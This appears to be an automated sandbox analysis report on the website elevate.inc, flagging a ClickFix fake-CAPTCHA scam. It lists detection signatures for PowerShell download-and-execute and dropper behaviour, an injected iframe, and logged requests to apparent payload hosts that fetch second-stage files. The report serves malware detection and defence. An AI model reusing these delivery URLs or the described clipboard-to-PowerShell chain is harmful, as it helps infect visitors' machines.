Windows Analysis Report
https://www.elevate.inc/

General Information

Sample URL: https://www.elevate.inc/
Analysis ID: 1708637
Infos: yara, sigma

Detection

CAPTCHA Scam ClickFix
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Detect drive by download via clipboard copy & paste
Malicious sample detected (through community Yara rule)
Sigma detected: Powershell download and execute file
Suricata IDS alerts for network traffic
Yara detected CAPTCHA Scam ClickFix
Yara detected Powershell download and execute
Bypasses PowerShell execution policy
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to download and execute files (via powershell)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTML page contains hidden javascript code
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Phishing

Source: Yara match File source: 0.9.pages.csv, type: HTML
Source: Yara match File source: 0.16.pages.csv, type: HTML
Source: Yara match File source: 0.11.pages.csv, type: HTML
Source: Yara match File source: dropped/chromecache_257, type: DROPPED
Source: https://www.elevate.inc/ HTTP Parser: Base64 decoded: {"alg":"HS256","typ":"JWT"}
Source: https://www.elevate.inc/ HTTP Parser: Iframe src: https://player.vimeo.com/video/961277965?autoplay=0&muted=1&loop=1&background=0
Source: https://www.elevate.inc/ HTTP Parser: Iframe src: https://reefe.com.au/ab/elevateinc/check/index.html
Source: https://www.elevate.inc/ HTTP Parser: Iframe src: https://td.doubleclick.net/td/rul/11308007612?random=1749250529827&cv=11&fst=1749250529827&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be5641v9177334436z89174023338za200zb9174023338&gcd=13l3l3l3l1l1&dma=0&tag_exp=101509157~102015665~103116026~103200004~103233427~103351869~103351871~104653070~104653072~104661466~104661468~104698127~104698129&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.elevate.inc%2F&label=GC8HCKaWkqIZELyBipAq&hn=www.googleadservices.com&frm=0&tiba=AI-Powered%20Benefits%20Administration%20Software%20Solutions%20%7C%20Elevate&npa=0&pscdl=noapi&auid=505595167.1749250529&uaa=x86&uab=64&uafvl=Chromium%3B134.0.6998.36%7CNot%253AA-Brand%3B24.0.0.0%7CGoogle%2520Chrome%3B134.0.6998.36&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&_tu=Cg
Source: https://www.elevate.inc/ HTTP Parser: Iframe src: https://td.doubleclick.net/td/rul/11308007612?random=1749250529836&cv=11&fst=1749250529836&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be5641v9177334436za200zb9174023338&gcd=13l3l3l3l1l1&dma=0&tag_exp=101509157~102015665~103116026~103200004~103233427~103351869~103351871~104653070~104653072~104661466~104661468~104698127~104698129&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.elevate.inc%2F&hn=www.googleadservices.com&frm=0&tiba=AI-Powered%20Benefits%20Administration%20Software%20Solutions%20%7C%20Elevate&did=dZTQ1Zm&gdid=dZTQ1Zm&npa=0&pscdl=noapi&auid=505595167.1749250529&uaa=x86&uab=64&uafvl=Chromium%3B134.0.6998.36%7CNot%253AA-Brand%3B24.0.0.0%7CGoogle%2520Chrome%3B134.0.6998.36&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config
Source: https://www.elevate.inc/ HTTP Parser: No favicon
Source: https://www.elevate.inc/ HTTP Parser: No <meta name="author".. found
Source: https://www.elevate.inc/ HTTP Parser: No <meta name="copyright".. found
Source: unknown HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.16:49784 version: TLS 1.2
Source: unknown HTTPS traffic detected: 2.23.227.208:443 -> 192.168.2.16:49797 version: TLS 1.2
Source: unknown HTTPS traffic detected: 2.23.227.208:443 -> 192.168.2.16:49798 version: TLS 1.2
Source: unknown HTTPS traffic detected: 2.23.227.208:443 -> 192.168.2.16:49799 version: TLS 1.2
Source: unknown HTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.16:49800 version: TLS 1.2
Source: unknown HTTPS traffic detected: 150.171.29.254:443 -> 192.168.2.16:49802 version: TLS 1.2
Source: unknown HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.16:49806 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.175.173.86:443 -> 192.168.2.16:49807 version: TLS 1.2
Source: unknown HTTPS traffic detected: 161.97.71.23:443 -> 192.168.2.16:49808 version: TLS 1.2
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000011.00000002.1617422054.00000191692AC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\dll\System.pdb source: powershell.exe, 00000011.00000002.1617280035.0000019168FB0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdbs\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32A source: powershell.exe, 00000011.00000002.1617422054.00000191692AC000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities

Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

Source: Network traffic Suricata IDS: 2058473 - Severity 1 - ET MALWARE Observed ClickFix Powershell Delivery Page Inbound : 167.172.78.216:443 -> 192.168.2.16:49748
Source: global traffic HTTP traffic detected: GET /wp-content/d5 HTTP/1.1 Host: coreun.com Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /42/504.txt HTTP/1.1 Host: www.serranoweb.com Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: global traffic HTTP traffic detected: GET /654105530b98111cede036db/659d85dad1c8ab250a1bb658_620a8fd2dbed87842d9c0a00_pr-newswire-logo.avif HTTP/1.1host: cdn.prod.website-files.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /654105530b98111cede036db/659d85db79bd0e25b6f57aec_62abf1504d07fa11cd45af6f_PYMNTS-logo-green%25201%2520(1).avif HTTP/1.1host: cdn.prod.website-files.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /654105530b98111cede036db/659d84e639c50a31518316b0_64baf3d6c359f158a0977c2d_benefitspro.avif HTTP/1.1host: cdn.prod.website-files.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /654105530b98111cede036db/66e3279237aef04dc35516ef_benefitspro.avif HTTP/1.1host: cdn.prod.website-files.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /654105530b98111cede036db/66d8804d98330a06f1ef82a5_659d85dad1c8ab250a1bb658_620a8fd2dbed87842d9c0a00_pr-newswire-logo.avif HTTP/1.1host: cdn.prod.website-files.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /654105530b98111cede036db/659d84d6a02c61fd03773aef_620a8cd05162759375e5b000_employeebenefitnews-brand-logo-initials-01.svg HTTP/1.1host: cdn.prod.website-files.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /654105530b98111cede036db/67bf45c6067d5f46c28dc39e_pr-newswire-logo-full-color-rgb.png HTTP/1.1host: cdn.prod.website-files.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /654105530b98111cede036db/659d84d8756d3958917d9c6a_61e83a62bf43923885d61816_built-in-colorado-logo.avif HTTP/1.1host: cdn.prod.website-files.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /654105530b98111cede036db/659d84d64dab0e91b180b0a1_62d9e9960d2a19b98cd37877_benefitspro-footer-logo.webp HTTP/1.1host: cdn.prod.website-files.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /654105530b98111cede036db/659d84d6981620aca717f18b_645ab858fc8d736eb0ea829d_1200px-TechCrunch_logo.svg%2520(1).png HTTP/1.1host: cdn.prod.website-files.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /654105530b98111cede036db/659d84d642457f9a904abf3e_62029c49093069f37039eaba_technically%2520baltimore%2520logo.avif HTTP/1.1host: cdn.prod.website-files.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /654105530b98111cede036db/659d84d7f9942d052cbde9dd_62ab8fff6676244596d3e657_logo-1.avif HTTP/1.1host: cdn.prod.website-files.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /654105530b98111cede036db/659d84d734ec4c1a87185071_61f964502425d5694395c0da_tech-crunch-logo.png HTTP/1.1host: cdn.prod.website-files.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /6537d1496ae55969d9298a91/65aecfb3e0847f76c91dfc6a_icon_automation.svg HTTP/1.1host: cdn.prod.website-files.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /654105530b98111cede036db/659d84d8482ac5ec161a86d9_64baf362c1aaca06d73b4f71_anthemis%2520insights.avif HTTP/1.1host: cdn.prod.website-files.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /6537d1496ae55969d9298a91/6814767b68efbf457c71041c_67213321960af3e15206fb23_670421de247a5a4a48c580f1_RMRlogo600dp1.avif HTTP/1.1host: cdn.prod.website-files.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /654105530b98111cede036db/659d84d6a2501869585791dd_62029bc50941c284d8f4d49e_benefitspro%2520logo.avif HTTP/1.1host: cdn.prod.website-files.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /6537d1496ae55969d9298a91/658c475399e5cbfecce1c499_elevate%20-%20logo%20white.webp HTTP/1.1host: cdn.prod.website-files.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /6537d1496ae55969d9298a91/658c59bd6f7007cb92213a3a_icon_finance_1.svg HTTP/1.1host: cdn.prod.website-files.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /6537d1496ae55969d9298a91/65aecfb356fccb79839880ab_icon_health-plans_1.svg HTTP/1.1host: cdn.prod.website-files.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /6537d1496ae55969d9298a91/65aecfb45ab1bb7a4a8ebddf_icon_third-party_1.svg HTTP/1.1host: cdn.prod.website-files.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /6537d1496ae55969d9298a91/6830f94bb1339e06239d3298_Screens_2025_v3.png HTTP/1.1host: cdn.prod.website-files.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /6537d1496ae55969d9298a91/68146d8aceebfcc75b9b7b40_rippling.png HTTP/1.1host: cdn.prod.website-files.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /component-parts HTTP/1.1host: www.elevate.incsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7purpose: prefetchsec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: emptyreferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=4, i
Source: global traffic HTTP traffic detected: GET /use-cases/third-party-administrators HTTP/1.1host: www.elevate.incsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7purpose: prefetchsec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: emptyreferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=4, i
Source: global traffic HTTP traffic detected: GET /654105530b98111cede036db/67de40df9813cb129fbf4dfb_FinTech_Breakthrough_Award_2025-Color-Year%20(1).png HTTP/1.1host: cdn.prod.website-files.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /resource-center HTTP/1.1host: www.elevate.incsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7purpose: prefetchsec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: emptyreferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=4, i
Source: global traffic HTTP traffic detected: GET /video/961277965?autoplay=0&muted=1&loop=1&background=0 HTTP/1.1Host: player.vimeo.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeSec-Fetch-Storage-Access: activeReferer: https://www.elevate.inc/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=AEavhtdI_PLldZE5nidl_6HspN587FQjguzExV.TNz0-1749250528-1.0.1.1-AaFL6i3yjww_MMr3x42iUqucsa1WEWsvYvf00avmQTwANX99C2bjRA4fQcD0_DA8; _cfuvid=Ga5wb9Edq3HlTeWPcoSeKVx2IOI3gG0Ki.DqRa3b5vY-1749250528014-0.0.1.1-604800000
Source: global traffic HTTP traffic detected: GET /use-cases/financial-institutions HTTP/1.1host: www.elevate.incsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7purpose: prefetchsec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: emptyreferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=4, i
Source: global traffic HTTP traffic detected: GET /use-cases/benefit-platforms HTTP/1.1host: www.elevate.incsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7purpose: prefetchsec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: emptyreferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=4, i
